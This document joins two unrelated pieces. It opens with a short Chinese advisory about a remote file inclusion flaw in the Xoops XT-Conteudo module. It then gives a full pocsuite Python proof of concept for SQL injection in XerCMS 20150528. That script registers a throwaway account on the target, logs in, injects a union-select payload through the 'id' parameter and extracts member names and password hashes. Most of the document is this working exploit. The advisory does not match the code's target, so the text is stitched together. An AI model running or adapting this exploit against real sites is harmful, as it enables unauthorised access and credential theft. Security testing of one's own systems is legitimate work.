Xoops XT-Conteudo是一款基于PHP的WEB应用程序。
Xoops XT-Conteudo不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。
问题是由于'spaw_control.class.php'脚本对用户提交的'spaw_root'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。
Xoops XT-Conteudo Module 1.52
目前没有详细解决方案提供:
<a href="http://www.xoops.org/" target="_blank">http://www.xoops.org/</a>
#!/usr/bin/env python
# coding: utf-8
import binascii
import os
import re

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
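class TestPOC(POCBase):
    """pocsuite POC for a SQL injection in the XerCMS 20150528 member module.

    The injectable parameter is ``id`` of ``/?m=member&a=message&d=rely``,
    which is only reachable by a logged-in member.  ``exploit`` therefore
    first registers a throw-away account on the target and logs in with it
    before sending a ``union select`` payload.

    Operational caveat: that registration is a persistent, visible side
    effect on the target -- the account is never removed and the requests
    leave an obvious trail in the member table and web logs.  Run this only
    against systems you are authorised to test.
    """
    vulID = '1885'  # vul ID
    version = '1'
    author = ['ricter']
    vulDate = '2015-06-01'
    createDate = '2015-06-01'
    updateDate = '2015-06-01'
    references = ['']
    name = 'XerCMS 20150528 /XerCMS/Modules/member/index.php SQL注入漏洞 POC'
    appPowerLink = 'http://www.xercms.com/'
    appName = 'XerCMS'
    appVersion = '20150528'
    vulType = 'SQL Injection'
    desc = '''
        XerCMS 将用户传入的字符直接带入无单引号保护的 SQL 语句,导致 SQL 注入
        漏洞,可以获取管理员的账号密码,造成信息泄露。
    '''
    samples = ['']

    def random(self, length=5):
        """Return ``length`` random hex characters for throw-away credentials.

        ``os.urandom`` keeps the registered username from colliding with a
        previous run.  ``binascii.hexlify`` replaces the Python 2-only
        ``str.encode('hex')`` and produces the same text on Python 2 and 3.
        """
        # hexlify() doubles the byte count, so slice back down to ``length``.
        return binascii.hexlify(os.urandom(length))[:length].decode('ascii')

    def exploit(self, payload):
        """Register, log in, then fire ``payload`` through the injectable ``id``.

        ``payload`` is a SQL expression spliced unquoted into
        ``id=0 union select 0,(<payload>)`` and sent to the target verbatim;
        building the injection string is the point of this method, so it is
        deliberately not parameterized.  Returns the decoded body of the
        injected response.

        Side effect on the target: a new member account with random
        credentials is created and never cleaned up.
        """
        base = self.url
        reg_url = '%s/?m=member&a=registerPost' % base
        login_url = '%s/?m=member&a=loginPost' % base
        exploit_url = (
            '%s/?m=member&a=message&d=rely&id=0 union select 0,(%s)' %
            (base, payload)
        )
        user = {
            'member[name]': self.random(),
            'member[pass]': self.random(10),
        }
        reg_user = {
            'member[name]': user['member[name]'],
            'member[pass]': user['member[pass]'],
            'member[pass2]': user['member[pass]'],
            'member[nick]': self.random(),
            # The published listing carried a mangled '%[email protected]'
            # literal, which is not a valid %-format and raises ValueError.
            # Any syntactically valid address works for the throw-away
            # registration; example.com is the RFC 2606 reserved domain.
            'member[email]': '%s@example.com' % self.random(),
        }
        sess = req.Session()
        # NOTE(review): no timeout is set on these calls; if ``req`` is the
        # requests wrapper pocsuite ships, passing ``timeout=`` would keep a
        # hung target from stalling the whole scan -- confirm before adding.
        sess.post(reg_url, data=reg_user)
        sess.post(login_url, data=user)
        # .text rather than .content so the regex and ``in`` checks in
        # _attack/_verify operate on text under both Python 2 and 3
        # (on Python 3 .content is bytes and those checks would raise).
        return sess.get(exploit_url).text

    def _attack(self):
        """Extract the first member row (``name::md5(pass)``) via the injection.

        ``limit 1`` without ``order by`` returns whichever row the database
        yields first; the key is named ``AdminInfo`` on the assumption that
        this is the administrator -- treat the result accordingly.
        """
        result = {}
        response = self.exploit(
            'select concat(name,0x3a3a,pass)from xercms_member limit 1'
        )
        # The selected column is echoed back inside the hidden
        # message[uid] input; 0x3a3a is the "::" separator in the payload.
        data = re.search(
            r'name="message\[uid\]" value="(?P<Username>.*?)::'
            r'(?P<Password>[\w\d]{32})"',
            response,
        )
        if data:
            result['AdminInfo'] = data.groupdict()
        return self.parse_attack(result)

    def _verify(self):
        """Confirm the injection with a side-effect-free ``md5(24091293)`` probe.

        Only the digest the payload is expected to produce is looked for in
        the page, so verification reads no application data.
        """
        result = {}
        response = self.exploit('md5(24091293)')
        if 'd55f9a6634498b197e64e134121405db' in response:
            result['VerifyInfo'] = {'URL': self.url}
        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in a pocsuite Output: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output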
# Hand the POC class to pocsuite so the framework can discover and run it.
register(TestPOC)